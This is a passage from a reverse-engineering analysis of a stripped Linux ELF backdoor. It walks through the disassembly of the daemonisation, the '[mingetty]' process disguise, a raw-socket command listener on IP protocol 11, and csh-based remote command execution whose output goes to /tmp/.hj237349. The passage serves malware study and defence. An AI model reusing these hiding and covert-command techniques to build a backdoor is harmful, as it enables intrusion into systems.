Analysis
This analysis was written as a work in progress. It is not written as a review,
it was written line-by-line during the disassembly process, and as such, shows
all ideas and methods used to draw the various conclusions about the binary.
People will find this useful if they:
* Have a firm grasp on x86 assembly.
* Are interested in investigating Linux binary files.
* Have lots of time :)
It should be noted, this document was constrcuted over many nights and early mornings, and as such some things may make no sense. The original form of this analysis is a text file. This version is much shorter due to the easier formatting. Thanks goes to stimpz for converting my vi analysis file to this html file under short notice.
A. Binary Analysis
i) Binary type:
exploit-dev:/reverse# file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1,
statically linked, stripped
ii) Execution starting point:
Since the binary could well be quite smart (and its stripped - ugh), we'll
get ourselves a dump of the important parts of the elf header:
exploit-dev:/reverse# hexdump the-binary | head -n 2
0000000 457f 464c 0101 0001 0000 0000 0000 0000
0000010 0002 0003 0001 0000 8090 0804 0034 0000
Important parts of this data are the bytes 0000018 to 000001B. Important
because this is "e_entry" - entry point for the code (little endian byte
order - also obtained from header).
[see Elf32_Ehdr - elf.h]
e_entry = 0x08048090
iii) The code is disassembled, starting from 0x08048090. What is seen is quite
standard C setup code. After following several calls and finding nothing
tricky, we reach a set of instructions that appear to correspond to
further coded execution points.
These are:
0x80480e1: call 0x8048080
0x80480e6: call 0x8048134
0x80480eb: pushl %eax
0x80480ec: call 0x8055fbc
Analysis of the first call at 0x80480e1 shows it to resemble the
initialisation section that calls any constructors and returns.
dumping the .ctors (constructors) section shows:
(gdb) x/12b 0x80792ac
0x80792ac: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x80792b4: 0xff 0xff 0xff 0xff
This indicates (and analysis of the call at 0x80480e1 shows) that there
are no constructors! Yet again, a whole lot of code analysis, with no
secret special undercover bits found.
While looking at this section, it should be noted this is standard startup
code, with the above three calls corresponding to init, main, and exit
codes which are present in any standard elf32 gcc-compiled binary.
(Running strings on the binary reveals that GNU GCC 2.7.2 appears to be
the compiler used!)
iv) "main" Analysis - finally something of interest...
For the purposes of this code we'll term the memory reference at 0x8048134
as "main" since this is probably what it would correspond to for the
blackhat.
One thing can be noted straight off, this is NOT one of those short
generic kiddie backdoors, it is long and complex and is a real *&^@#!
because it's stripped. i.e. This is going to be an extremely long process
to analyse it in any depth. Any shallow investigation work on it will
only lead to the missing of the details. With that said however, the
setup code here contains little new or specific to this binary. As such,
the smaller details here will only be mentioned with assembly ranges
rather than a full disassembly with line-by-line commentary. If one
wishes to follow this section, they are advised to be running a
dissassembler on the binary in another console. ;)
Getting right into the code, we saw earlier the call to 0x8048134. This
marks the start of the "main" code:
0x8048134 - 0x804817a:
generic function/variable setup.
0x804817b: call 0x805720c
Inspection:
0x805720f: movl $0x31,%eax
0x8057214: int $0x80
[Quick howto for asm int $0x80 (calls 0x31 == 49)]
exploit-dev:/reverse# grep -i "49" /usr/include/asm/unistd.h
#define __NR_geteuid 49
Simply looks like generic geteuid() code
0x8048180 - 0x804818a:
If we do not have root privs, we call 0x8055fbc. A quick look at the
code of this function makes it look like exit() code - But has not been
checked in-depth!!.
0x804818c - 0x804819e:
This section i have never seen any compiler generate code like this. It
has the effect of determining string length (It may possibly be some
form of custom inline assembly?) [Later realised the binary has been
compiled with optimisations, and this is more than likely an optimised
strlen().]
0x804819f - 0x80481a7:
Unsure of function call. From the stack setup it looks to be
function(pointer, 0, pointer). Possibly a memset() but needs to be
verified with execution.
0x80481a8 - 0x80481cb:
A direct memory copy of 10 bytes from 0x80675d8.
(gdb) x/1s 0x80675d8
0x80675d8: "[mingetty]"
It is assumed this is an argv[0] replacement to hide the binary under
programs such as ps. If so, then the previous section is more than
likely a memset() as assumed.
0x80481cc - 0x80481d4:
Call which eventually leads to:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
sigaction() call. Setup seems to be for signal(). pushl's at
0x80481cc and 0x80481ce would correspond to signal(SIGCHLD, SIG_IGN).
This lets a parent process to not have to wait for the child process to
finish.
0x80481d5 - 0x80481d9:
Call which eventually leads to:
0x80571eb: movl $0x2,%eax
0x80571f0: int $0x80
fork() call. This would explain the previous sigaction.
0x80481da - 0x80481e7:
If we are the parent we call 0x8055fbc which was earlier deemed to most
likely be exit() code. Since this would be a common thing to do to
daemonise code, it will be accepted that 0x8055fbc is indeed exit()
code for the rest of this analysis.
0x80481e8 - 0x80481ec:
Call which eventually leads to:
0x805733f: movl $0x42,%eax
0x8057344: int $0x80
setsid() call.
0x80481ed - 0x8048208:
Identical signal() / fork() code. This will completely dissociate
this process from any other.
0x804820c - 0x8048215:
Call which eventually leads to:
0x8057138: movl $0xc,%eax
0x8057140: int $0x80
chdir() call. The value pushed onto the stack just prior to the call:
(gdb) x/1s 0x80675e3
0x80675e3: "/"
This is an obvious attempt to change the current directory to /.
0x8048216 - 0x804822a:
Call which eventually leads to:
0x8057164: movl $0x6,%eax
0x805716c: int $0x80
close() call. Three of these are called with stack setups which
correspond to: close(0), close(1), and close(2). Effectively closing
all 'normal' inherited file descriptors.
0x8048249 - 0x804824f:
Call which eventually leads to:
0x8057448: movl $0xd,%eax
0x8057450: int $0x80
time() call. Stack shows it is a time(0) call.
0x8048253 - 0x8048258:
Looks to be a function call using the return of time(0). The function
seems very complex with regards to processing, but does not seem to
have any significant purpose...the use of time(0) could suggest it is
an srandom() call but this only a guess and it could be something
written by the author themself.
0x804825c - 0x8048266:
Call which eventually leads to:
0x8056d0d: movl $0x1,%edx
0x8056d15: movl $0x66,%eax
0x8056d1a: movl %edx,%ebx
0x8056d1c: int $0x80
socketcall. Checking %ebx reveals it is actually a call for socket().
A quick look at the stack setup shows pushes of 0xb, 0x3, 0x2,
corresponding to a socket(2, 3, 11). A quick look in socket.h reveals
it is: socket(AF_INET, SOCK_RAW, 11). My personal /etc/protocols
doesn`t have a type 11, nor could i find any reference to what actually
uses this protocol. [Side note: curiosityLevel++]
0x804826d - 0x8048296:
Call which eventually leads to:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
sigaction again. More specifically, the author seems to call signal()
yet again, 4 times. Each time the first value pushed (second function
parameter) is a 0x1 which corresponds to a SIG_IGN. SIGHUP, SIGTERM,
and SIGCHLD correspond to the other values, with SIGCHLD ignored twice
for some reason...
0x80482b0 - 0x80482c9:
Call which eventually leads to:
0x8056b63: movl $0xa,%edx
0x8056b6b: movl $0x66,%eax
0x8056b70: movl %edx,%ebx
0x8056b72: int $0x80
socketcall. Once again, checking %ebx shows the call to be SYS_RECV.
Looking at the setup to the call:
0x80482b0: pushl $0x0
0x80482b2: pushl $0x800
0x80482b7: leal 0xfffff800(%ebp),%eax
0x80482bd: pushl %eax
0x80482be: movl 0xffffbb38(%ebp),%ecx
0x80482c4: pushl %ecx
0x80482c5: call 0x8056b44
This corresponds to: recv(X, Y, 0x800, 0). It is assumed X is the
previously created socket [Assumption later verified as correct], and Y
is some buffer. This call will be a blocking call.
0x80482d5:
We continue down to the first of a series of checks:
0x80482cf: movl 0xffffbb30(%ebp),%edx
0x80482d5: cmpb $0xb,0x9(%edx)
Checking of what 0xffffbb30(%ebp) really is (from earlier in the code):
0x804814d: leal 0xfffff800(%ebp),%edx
0x8048153: movl %edx,0xffffbb30(%ebp)
We can now see that (%edx) corresponds directly to the recv() buffer.
Back to the compare statement, we can see that we compare the 10th byte
of the packet to the value of 0xb. We know that the socket is a raw
socket so it will fill in the buffer beginning with an IP header. A
check in ip.h of an ip header shows the 10th byte should correspond to
none other than the protocol. We end up comparing this to none other
than 11. Considering the socket() call was for protocol 11, this is
probably an unnecessary check...
0x80482e5:
Next check:
0x80482df: movl 0xffffbb2c(%ebp),%ecx
0x80482e5: cmpb $0x2,(%ecx)
Once again, checking what 0xffffbb2c(%ebp) really is:
0x8048159: leal 0xfffff814(%ebp),%ecx
0x804815f: movl %ecx,0xffffbb2c(%ebp)
So it appears (%ecx) will point to 0x14 bytes into the recv() buffer.
Nice and tidy that it points to just after a normal IP header
(20bytes)! We end up comparing the first byte of the after-IP-header
data and checking that it is a 0x2.
0x80482ee:
Next Check:
0x80482ee: cmpl $0xc8,%esi
0x80482f4: jle 0x8048eb8
We have to go back to see what %esi is:
0x80482c5: call 0x8056b44
0x80482ca: movl %eax,%esi
The "call 0x8056b44" was earlier seen to be a recv(). The next line
will put the return of this function(the amount of data read by recv())
into %esi. So when we do the cmpl statement, we're actually checking
if the amount of data read is at least 0xc8 bytes.
For sake of loose ends, if any of these checks fail, the execution jumps
to 0x8048eb8 which is where we'll end up later anyway. These checks are
a typical example of "if (check && check && check) { do things }".
Whether or not the checks all turn out true or false, we eventually end
up at 0x8048eb8 which has:
0x8048eb8: pushl $0x2710
0x8048ebd: call 0x80555b0
0x8048ec2: addl $0x4,%esp
0x8048ec5: jmp 0x80482b0
The call at 0x80555b0 contains another call which eventually leads us to:
0x80574a4: movl $0x52,%eax
0x80574ac: int $0x80
A select() call with the following parameters:
0x80555e7: pushl %eax
0x80555e8: pushl $0x0
0x80555ea: pushl $0x0
0x80555ec: pushl $0x0
0x80555ee: pushl $0x1
0x80555f0: call 0x80574a0
This seemed rather odd until google showed the way. Pulled from the
"Unix Programming Frequently Asked Questions":
1.3 How can I sleep for less than a second?
[...]
* You can use select() or poll(), specifying no file descriptors to
test; a common technique is to write a usleep() function based on
either of these...
Looks like this function was simply a sleep or usleep call...(ugh #3 @
wasted time)
And as can be seen:
0x8048ec5: jmp 0x80482b0
upon completion of the sleep, we jump back up to the recv() call in a
continuous loop.
v) Core Functionality:
Section iv quickly looked at the coding that had gone into the
initialisation of the binary. This section will now analyse the loop
which upon glance, looks to have quite a lot of functionality (hopefully
containing something to make drudging through everything else
worthwhile!). This section will be looked at in a LOT more detail, with
a line-by-line commentary where needed if particular areas are complex.
0x80482fa:
We return back to 0x80482fa. This point should only be reached when
the following conditions are met on a received packet:
* IP Protocol is 11
* 1st byte (assuming 20 byte IP header) of IP packet data must be a
binary 0x2.
* Packet length (including IP header) must be greater than 0xc8
bytes (200 bytes).
Continuing analysis:
0x80482fa: movl 0xffffbb20(%ebp),%edx
0x8048300: pushl %edx
0x8048301: movl 0xffffbb28(%ebp),%ecx
0x8048307: pushl %ecx
0x8048308: leal 0xffffffea(%esi),%eax
0x804830b: pushl %eax
0x804830c: call 0x804a1e8
The code at 0x804a1e8 does not appear to do anything of functionality.
Instead, it looks to do a form of memory manipulation. The following
is a quick analysis of this function and how one can draw an educated
guess as to its memory manipulation purpose:
It contains a single call to 0x804f808 which itself calls 0x804f820.
Still nothing system-ish called even from this function directly,
however it sparks up a whole tree of calls:
0x8061f34 - does memory manipulations
0x8052e80 - seems to also do memory manipulations
- I recognise some string-based optimised code such as
strlen(). Can't be sure that's what it is, but it is
identical to the code earlier that i believe is
a compiler optimised strlen().
- calls 0x8061b6c
- calls 0x8066154
- contains function calls to munmap()
0x804f888 - calls 0x8052de8
- calls 0x805602c
- follows some execution path i cannot follow...
0x8061910 - unsure
This one call at 0x804a1e8 seems to be more about memory manipulation,
possibly string-based than anything else. It is probably not worth
sifting through - at least for the moment. It would probably be
better left for run-time debugging.
A quick look at the parameters passed to this function reveal the
passing of 0xffffbb20(%ebp), 0xffffbb28(%ebp), and 0xffffffea(%esi).
Matching these up with appropriate data:
0xffffbb20(%ebp):
The last time 0xffffbb20(%ebp) was modified:
0x8048297: leal 0xfffff000(%ebp),%ecx
0x804829d: movl %ecx,0xffffbb20(%ebp)
There are no other references earlier in the code to
0xfffff000(%ebp). This address does however fall within the
initial stack allocation at the very beginning of the program:
0x8048137: subl $0x44f0,%esp
There seems to be at most 0x800 bytes until the next piece of
data which is referenced at 0x804814d. The next piece of data
was a block of memory passed to recv() as the buffer, also with a
size of 0x800. It is doubtful that this is a coincidence, and as
such, 0xffffbb20(%ebp) is believed to be a buffer of 0x800 bytes
[Upon completion of analysis, no other data appears to be
in this range, and the assumption of a size of 0x800 bytes is
believed correct].
0xffffbb28(%ebp):
The last time 0xffffbb28(%ebp) was modified occurred at startup:
0x8048165: leal 0xfffff816(%ebp),%edx
0x804816b: movl %edx,0xffffbb28(%ebp)
As we saw earlier in the analysis of the packet checks, we saw
that 0xfffff814(%ebp) pointed to directly after the IP header.
0xffffbb28(%ebp) obviously points to 0xfffff816(%ebp) which, as
can be seen, this would point to the 3rd byte of the IP packet
data.
0xffffffea(%esi):
Remember that we are dealing with a leal statement this time,
%esi at this point in time will still be equal to the amount of
data returned by recv. 0xffffffea(%esi) will be a direct value
of the amount of data received minus 0x16.
So the function call looks like this:
function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)
NOTE: 0x804a1e8 will be analysed further in the function analysis
section under the tile of "Data_Manipulation_Function_A".
0x8048314:
At this stage, it is assumed that the previous function named
"Data_Manipulation_Function_A" has quite possibly processed the
IP packet data contents and since it does not appear to do anything
system-wise, it is assumed its purpose is some form of encryption
processing on the packet [Later verified to be true - see Function
Analysis section].
The first statement of this block is:
movzbl 0xfffff001(%ebp),%eax
A look back at Data_Manipulation_Function_A shows the passing of
0xfffff000(%ebp) as the "SomeBuffer" (see function call appearance in
previous section). %eax is loaded with the 2nd byte from this buffer.
0x804831b - 0x804832b:
At first glance, this section looks complex:
0x804831b: decl %eax
0x804831c: cmpl $0xb,%eax
0x804831f: ja 0x8048eb8
0x8048325: jmp *0x804832c(,%eax,4)
Experience allows this section to easily be identified as a typical
implementation of a C switch() statement. This switch will be based
upon the previously discussed 2nd byte from "SomeBuffer".
The cmpl and ja statements are typical of a limited switch statement
where no case options are met. If this selected byte is greater than
12, execution will be directed to the familiar code of 0x8048eb8. As
seen earlier, this jump simply results in a brief sleeping state,
followed by a jump back to the recv() function.
The jmp table would have to consist of 0xc entries (each of 4 bytes),
and is located at 0x804832c:
(gdb) x/48b 0x804832c
0x804832c: 0x5c 0x83 0x04 0x08 0xf0 0x83 0x04 0x08
0x8048334: 0x90 0x85 0x04 0x08 0x1c 0x87 0x04 0x08
0x804833c: 0xc8 0x87 0x04 0x08 0x94 0x88 0x04 0x08
0x8048344: 0xcc 0x8a 0x04 0x08 0x58 0x8b 0x04 0x08
0x804834c: 0x80 0x8b 0x04 0x08 0x34 0x8c 0x04 0x08
0x8048354: 0x08 0x8d 0x04 0x08 0xe4 0x8d 0x04 0x08
So in a more readable format:
SomeBuffer[1] jump address
1 0x0804835c
2 0x080483f0
3 0x08048590
4 0x0804871c
5 0x080487c8
6 0x08048894
7 0x08048acc
8 0x08048b58
9 0x08048b80
A 0x08048c34
B 0x08048d08
C 0x08048de4
* NOTE the decl %eax was taken into consideration hence why our
list starts at 1 instead of 0.
Case code (believe it or not, this is where things get complex!):
0x0804835c:
This section appears to have three parts.
* Setup a buffer at 0xfffff800(%ebp)
* Do memory manipulation on this buffer
* Send special packets containing this manipulated data
The buffer setup starts off rather peculiar. It uses a memory 0 to
set 0xfffff800(%ebp) to 0. Probably generated from a
strcpy(Buffer, "") call that has been optimised by the compiler.
It should be noted that 0xfffff800(%ebp) is the same buffer we used
for recv(). It actually contains our original packet so in effect
we are making modifications to the original packet.
Another 3 modifications are made (First of which overwrites the
'strange' modification - adds extra strangeness to it although it
could simply be a bug...).
buffer at 0xfffff800(%ebp) has the following modifications:
0xfffff800(%ebp) = 1 byte value from heap at 0x807e77c.
This heap position has not been modified in any
way at program startup. It is probably a
global variable that we will name "Global_A".
0xfffff801(%ebp) = 1
0xfffff802(%ebp) = 7
Another byte in the heap at 0x807e774 is now checked. If it is
non-zero, the following is done:
0xfffff803(%ebp) = 1
0xfffff804(%ebp) = byte value at 0x807e778
If it is zero:
0xfffff803(%ebp) = 0
The following code is then followed under all conditions:
0x80483a7: movl 0xffffbb20(%ebp),%edx
0x80483ad: pushl %edx
0x80483ae: leal 0xfffff800(%ebp),%eax
0x80483b4: pushl %eax
0x80483b5: pushl $0x190
0x80483ba: call 0x804a194
The call when analysed exhibits very similar functionality as
Data_Manipulation_Function_A, however it is not identical. This
function at 0x804a194 will be termed Data_Manipulation_Function_B
and looked at in detail in the Function Analysis section.
0xffffbb20(%ebp) seems familiar, and when looking over the previous
code, it is seen to still be 0xfffff000(%ebp). This is the 'buffer'
that was earlier passed to Data_Manipulation_Function_A.
0xfffff800(%ebp) is also familiar, being the buffer that contains
our original packet as recived by recv(), with the modifications
made earlier in this case section.
Finally, the value 0x190 is hardcoded and is passed to
Data_Manipulation_Function_B, prompting reasoning that this function
is multi-purpose and not unique to this case section.
Next part of this section:
0x80483bf: call 0x8056058
0x80483c4: movl $0xc9,%ecx
0x80483c9: cltd
0x80483ca: idivl %ecx,%eax
Unknown what purpose this serves, possibly key generation of
some description, but this would be a wild guess. The call does
not appear to do anything system-wise. Whatever the result,
%eax appears to be the reason for these instructions since:
0x80483ce: leal 0x190(%ebx),%eax
0x80483d4: pushl %eax
This is the first parameter put on the stack for a new function we
will look at shortly. This parameter is effectively 0x190 + the
value in %ebx which was processed as part of the previous code.
[Note, this call at 0x8056058 has since been thought to be a random
number generator, the code just after this call would indicate it
would then be MOD 0xc9]
The next parameter is already becoming quite familiar:
0x80483d5: movl 0xffffbb20(%ebp),%edx
0x80483db: pushl %edx
0xffffbb20(%ebp) is already familiar, as the 'buffer' that was
passed to Data_Manipulation_Function_B.
The next parameter is new and has not yet been looked at:
0x80483dc: movl 0xffffbb1c(%ebp),%ecx
0x80483e2: pushl %ecx
0xffffbb1c(%ebp) falls directly before 0xffffbb20(%ebp), so it can
be assumed that 0xffffbb1c(%ebp) is some form of 4 byte variable.
This variable was set much earlier just prior to the recv() call:
0x80482a3: leal 0xffffee48(%ebp),%edx
0x80482a9: movl %edx,0xffffbb1c(%ebp)
Looking at the contents of the stack at 0xffffee48(%ebp), the
closest variable reference that can be found anywhere in the code
appears to be:
0x8048638: leal 0xffffee70(%ebp),%edx
This portion of code does appear to be a legitimate part of the
program and will be analysed later. During this stage of analysis,
the memory starting at 0xffffee48(%ebp) is suspected of being a
buffer of at least 40 bytes. This portion of memory will be termed
Buffer_A for the rest of this analysis.
With these variables on the stack:
0x80483e3: call 0x8048ecc
Attempting to piece the function into a C format:
function(Buffer_A, manipulated_buffer, 0x190 + X)
The function is normally reviewed prior to the parameters just to
ensure it is a vital part of the code. This function was indeed
quickly checked and has been determined to contain references to:
0x8056d0d: movl $0x1,%edx
0x8056d15: movl $0x66,%eax
0x8056d1a: movl %edx,%ebx
0x8056d1c: int $0x80
This corresponds to a socket() call and as such the function will be
reviewed later in the function analysis section. It has been termed
Network_Function_A.
Upon completion of this code, a jump is followed back to 0x8048eb8.
As you may recognise, this is just before the sleeping state which
is followed by the jump back to recv().
[This section is re-examined later when more information is known
about the various buffers and especially Network_Function_A. The
re-analysis is named Re-Examination_A.]
0x080483f0:
A lot of variable setup seems to occur in this section. Of note is
the setting of the 0x807e780-0x807e783 range from the 17th to 20th
bytes of the packet data from the recv() function. Of note, is that
this is the destination IP for the packet (normally the IP of the
machine running the binary).
One of the first few calls executed looks like this:
0x804842d: pushl $0x0
0x804842f: call 0x8057444
0x8048434: addl $0x4,%esp
0x8048437: pushl %eax
0x8048438: call 0x80559a0
These two calls were analysed earlier when they were called from
0x8048249. At that point in time, the first call was deemed to be a
time(0), and the second was suspected (but by no means confirmed) to
be an srandom() call using the time(0) return as a parameter.
A new function call then appears:
0x8048440: call 0x8056058
This function seems to only have one purpose, that is to call
another:
0x805605b: call 0x8055e38
This one is not recognised either, and following it does not unleash
its secrets. It seems to read from 0x8078958, but it is unknown
just what is at this location at this time. Given the suspected
srandom(), it is quite possible this is some kind of random number
function!
This makes a lot of sense given the next piece of code:
0x8048445: movl $0xa,%ecx
0x804844a: cltd
0x804844b: idivl %ecx,%eax
This looks simply like MOD code that will ensure %eax is always a
value from 0 to 9.
The next section is quite complex. A full analysis will be needed.
We enter the section with our 'probable' random value from 0 to 9 in
%eax.
A long look at the code flow of the following shows it to be a loop.
It looks like %ebx takes a counter and pointer role, seeing the loop
through the values 0 through to 9 (would make sense considering the
value in %eax):
0x804844d: movl %edx,%edi
0x804844f: xorl %ebx,%ebx
0x8048451: xorl %esi,%esi
0x8048453: nop
0x8048454: cmpl %edi,%ebx
0x8048456: je 0x804852b
0x804845c: cmpl $0x2,0x807e784
0x8048463: jne 0x8048498
[...]
0x804852e: incl %ebx
0x804852f: cmpl $0x9,%ebx
0x8048532: jle 0x8048454
The core of the code (inside the loop) consists of conditional
sections with it all being encapsulated from the conditional at
0x8048454. A further conditional (and much more important) is
located at 0x804845c. It splits the rest of the loop contents into
two parts, and seems to be conditional on a value stored at
0x807e784. This value was set earlier in this very same case
section:
0x80483f0: movzbl 0xfffff002(%ebp),%edx
0x80483f7: movl %edx,0x807e784
And once again we see the familiar 0xfffff000(%ebp) range. For a
reminder, this is the data buffer passed to
Data_Manipulation_Function_A earlier. As we can see, the 3rd byte
is used for setting the contents of 0x807e784, which due to its
location can be assumed to be a global variable. Since it seems it
could be of importance, we'll name it "Global_B".
With the flow sorted out, lets now look at what purpose this section
could possibly play.
Firstly, we have a loop that relies on a variable that is never
modified within the loop. This ensures it will repeat 10 times.
To simplify what is going on, the first conditional will play a
role. It will trigger on all values 0 to 9 except the one that is
equal to our 'random 0 to 9' number. The reason behind leaving this
one out will be seen later.
As for what all this code does, it seems to want to set values in
the memory pointed to by 0xffffbb1c(%ebp). This just happens to be
a buffer we've already identified as Buffer_A.
It works like this:
If Global_B (set by third byte in the manipulated buffer) = 2
Buffer_A will be set directly to contents of the manipulated
buffer.
Else
Buffer_A's contents will be set using random numbers.
It's not quite as simple as a direct memory fill. Buffer_A seems
to be structured in 4 byte increments, and the buffer is either
copied, or filled with random numbers accordingly.
We had an earlier assumption that Buffer_A is 40 bytes long. Given
this loop iterates 10 times and fills 4 bytes at a time, i think
this assumption can now be accepted as true.
After this loop completes:
0x8048538: movl 0x807e784,%eax
0x804853d: testl %eax,%eax
0x804853f: jne 0x8048543
0x8048541: xorl %edi,%edi
0x807e784 is Global_B. In effect, if Global_B = 0 then we'll xor
out %edi to 0. %edi doesn't seem to be a permanent variable of any
kind, and is used in a short time just after this check:
0x8048543: cmpl $0x2,%eax
0x8048546: je 0x8048eb8
In effect, this will compare Global_B to 0x2. If it is equal, it
will jmp off to 0x8048eb8 which should now be familiar as a break
from the switch().
At this point in time, we engage in a 4 byte copy from the
manipulated buffer:
0x8048555: movb 0xfffff003(%ebp),%al
0x804855b: movl 0xffffbb1c(%ebp),%ecx
0x8048561: movb %al,(%edi,%ecx,1)
[....]
After this we break from the switch and jmp off to 0x8048eb8 ready
to sleep and recv() all over again.
This section's purpose is still in the dark, however i am sure all
will be revealed as soon as Buffer_A's purpose can be identified.
[This section is re-examined later when more information is known
about the various buffers. The re-analysis is named
Re-Examination_A.]
0x08048590:
The very first thing we do here is call 0x80571e8 which is our fork
code. Very interesting. Just as interesting is this:
0x8048595: movl %eax,0x807e770
0x804859a: testl %eax,%eax
0x804859c: jne 0x8048eb8
Effectively, if the parent processes this code, the PID of the child
will be stored at 0x807e770. We'll name this heap variable as
PID_Var_A. Continuing if we are the parent, we will simply end this
case code and return back to the main recv() loop.
If we are the child, there is a lot more interesting stuff to be
done. Very first is a call to 0x805733c which corresponds to a
setsid() (not confirmed at this point in time).
Following this:
0x80485a7: pushl $0x1
0x80485a9: pushl $0x11
0x80485ab: call 0x80569bc
0x80485b0: call 0x80571e8
The 0x80569bc call with stack setup would correspond to:
signal((SIGCHLD, SIG_IGN)
This is immediately followed by another fork() call which does
something interesting.
If %eax is >0 (if we are the parent process)
Execute the following:
0x80485bc: pushl $0xa
0x80485be: call 0x80556cc
0x80485c3: pushl $0x9
0x80485c5: movl 0x807e770,%eax
0x80485ca: pushl %eax
0x80485cb: call 0x80572b0
0x80485d0: pushl $0x0
0x80485d2: call 0x8055fbc
0x80556cc has not yet been identified. So we go look..
This function calls:
0x8057360:
0x8057364: movl $0x7e,%eax
0x8057372: int $0x80
This corresponds to sigprocmask()
0x80574c8:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
This corresponds to sigaction()
0x8057444 = time() (already identified)
0x8057418:
0x805741c: movl $0x1b,%eax
0x8057421: movl 0x8(%ebp),%ebx
0x8057424: int $0x80
This corresponds to alarm()
0x805751c:
0x8057522: movl $0x48,%eax
0x8057530: int $0x80
This corresponds to sigsuspend()
The function can still not be staisfactorily identified, however
it is possibly a sleep() which would indicate the function at
0x80555b0 is not sleep() (it might be a usleep()). If indeed
this function IS a sleep(), then it should be easily verifiable
during runtime analysis.
In assuming this function was a sleep, this would indicate a 10
second sleep occurs.
Returning back to 0x80485cb, a call of 0x80572b0 is executed.
This function is also not known, so....
0x80572b4: movl $0x25,%eax
0x80572bf: int $0x80
This corresponds to a kill()
Just for ease, we'll reshow the code from above:
0x80485c3: pushl $0x9
0x80485c5: movl 0x807e770,%eax
0x80485ca: pushl %eax
0x80485cb: call 0x80572b0
Since we also know what 0x807e770 is, this all looks like:
kill(PID_Var_A, 9)
The next call is to 0x8055fbc, and has already been identified as
an exit() (still only assumed but still seems logical).
This ends the parent process from the last fork. I am unsure if
this is a bug on behalf of the author. Since PID_Var_A would
be 0 since we would be the child process from the first fork,
this may not actually work as intended. Perhaps this does kill
the child process too, but first thoughts make me believe this is
a bug. One way or another, the parent process from the most
recent fork is no more. [Turns out this kill DOES work.]
Else (if we were the child process)
We pick up again at 0x80485d8. One of the first things we do is
this loop:
0x80485dc: movb 0xfffff002(%ebx,%ebp,1),%al
0x80485e3: movb %al,0xfffff000(%ebx,%ebp,1)
0x80485ea: incl %ebx
0x80485eb: cmpl $0x18d,%ebx
0x80485f1: jle 0x80485dc
This may be as simple as an optimised memcpy(). All it does is
copy 0x18d bytes from 0xfffff002(%ebp) to 0xfffff000(%ebp). This
effectively shifts the data across by 2 bytes in the buffer that
was earlier passed to Data_Manipulation_Function_A. This would
make sense considering we earlier used the 2nd byte of the data
to determine the switch() outcome.
Following on:
0x80485f3: pushl $0x80675e6
0x80485f8: movl 0xffffbb20(%ebp),%ecx
0x80485fe: pushl %ecx
0x80485ff: pushl $0x80675f5
0x8048604: leal 0xfffff800(%ebp),%ebx
0x804860a: pushl %ebx
0x804860b: call 0x804f808
0x804f808 is an unidentified function. In earlier trying to
follow it, I found it too complex and long to follow, so instead
we'll look at some of its parameters:
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
(gdb) x/1s 0x80675f5
0x80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1"
0xffffbb20(%ebp) is a pointer to 0xfffff000(%ebp) which is the
buffer that was earlier passed to Data_Manipulation_Function_A.
0xfffff800(%ebp) is the buffer that was earlier passed to the
recv() function.
The string contents at 0x80675f5 stand out to give us a fairly
reasonable guess as to what the function is (i.e. *printf/*scanf)
As a guess, one would expect 0xfffff000, now that is has been
shifted two bytes to the left is a string command sent by the
blackhat. Still cannot assume an sprintf() until:
0x8048610: pushl %ebx
0x8048611: call 0x80557e8
This call is yet unidentified, so in following it, we see it does
interrupt executions of: sigaction, sigprocmask, fork, execve.
Since its not a direct execve call (and given the redirection
string that was passed to it) it is assumed the function at
0x80557e8 is system(). This is not verified, but given the amount
of code involved with this function, im more tempted to assume
than have to verify it... Also, the earlier function at 0x804f808
is now also assumed to be a sprintf() given all the work done to
the buffer in %ebx (shifting it), and the string parameters being
located on the heap, i cannot see a reason for an sscanf.
to be true in order for system() to function correctly.
So assuming all the above, our execution looks like:
/bin/csh -f -c "somecommand" 1> /tmp/.hj237349 2>&1
This is a simple cshell command redirection into /tmp/.hj237349
which at first glance might seem kind of pointless, however:
0x8048616: pushl $0x8067614
0x804861b: pushl $0x80675e6
0x8048620: call 0x804f620
The call is fairly long, so to cut a long story short:
0x80572e0: movl $0x5,%eax
0x80572ee: int $0x80
We end up with an open() call. The parameters to this call look
like this:
(gdb) x/1s 0x8067614
0x8067614: "rb"
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
Its fairly clear this is a fopen() call, however it was only
quickly skimmed through and could be something else.
After checking that the fopen() call succeeds and do some
parameter setup, we end up calling 0x804f6d4. This function is
an unknown, and unfortunately the call at 0x8061d42 makes life
a little more difficult. Instead of trying to work out what the
internals of this function do, we'll look at its parameters that
have been pushed onto the stack before it is called:
0x8048644: movl 0xffffbb24(%ebp),%ecx
0x804864a: pushl %ecx
0x804864b: pushl $0x18e
0x8048650: pushl $0x1
0x8048652: leal 0xfffff800(%ebp),%eax
0x8048658: pushl %eax
0x8048659: call 0x804f6d4
This looks like:
function(Buffer, 1, 0x18e, 0xffffbb24(%ebp))
This still doesn't help much until we realise what
0xffffbb24(%ebp) actually is. Just after the fopen():
0x8048625: movl %eax,0xffffbb24(%ebp)
So, it looks like 0xffffbb24(%ebp) is our file descriptor. Now
an immediate assumption would be an fread or fwrite. Considering
our permissions on the file, we'll assume 0x804f6d4 is an fread().
We then engage in a memcpy-type arrangement:
0x8048670: movb 0xfffff800(%ebx,%ebp,1),%al
0x8048677: movb %al,0xfffff002(%ebx,%ebp,1)
0x804867e: incl %ebx
0x804867f: cmpl $0x18d,%ebx
0x8048685: jle 0x8048670
This copies the read data from the file into 0xfffff002(%ebx)+.
We then run a pointer to this buffer starting at 0xfffff000(%ebp)
to the function at 0x804a194 (Data_Manipulation_Function_B),
followed by a call of Network_Function_A.
It is at this point i am almost certain that
Data_Manipulation_Function_A is some kind of decoder, and
Data_Manipulation_Function_B is some kind of encoder.
The encoded data would be being passed to Network_Function_A
which would then pass the encoded packets on to the blackhat.
We cant assume this to be an exact conclusion as yet until
those three functions have been analysed in depth, however it's
looking like a pretty solid guess.
Jumping back just before we encode the data however, something
interesting happens. The code seems to keep tabs on %edi:
0x8048687: testl %edi,%edi
0x8048689: jne 0x804869c
It seems to act as a toggle. At first i didn't catch the second
loop and thus couldnt understand this, but when one realises that
